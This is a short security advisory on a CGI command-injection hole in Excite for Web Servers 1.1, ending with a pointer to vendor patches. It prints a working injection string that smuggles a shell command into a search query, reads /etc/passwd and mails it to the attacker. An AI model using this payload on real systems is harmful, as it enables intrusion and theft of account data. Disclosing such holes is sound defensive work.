COMMAND

    CGI hole in EWS (Excite for Web Servers)

SYSTEMS AFFECTED

    Systems running EWS 1.1

PROBLEM

    Marc Merlin found following.   While trying a query like  this one
    on a server "this and this and that" (with the quotes) he  noticed
    an error.  Classic mistake, it launches a shell with whatever  was
    given in the  query (even though  spaces are escaped  with a '$').
    Yet, the exploit remains simple:

        ";IFS="$";/bin/cat /etc/passwd|mail your_email_here;
        (or any other shell command you can thing of)

SOLUTION

    For more detailed information on the bug or to access the patches,
    go to the patches page at:

        http://www.excite.com/navigate/patches.html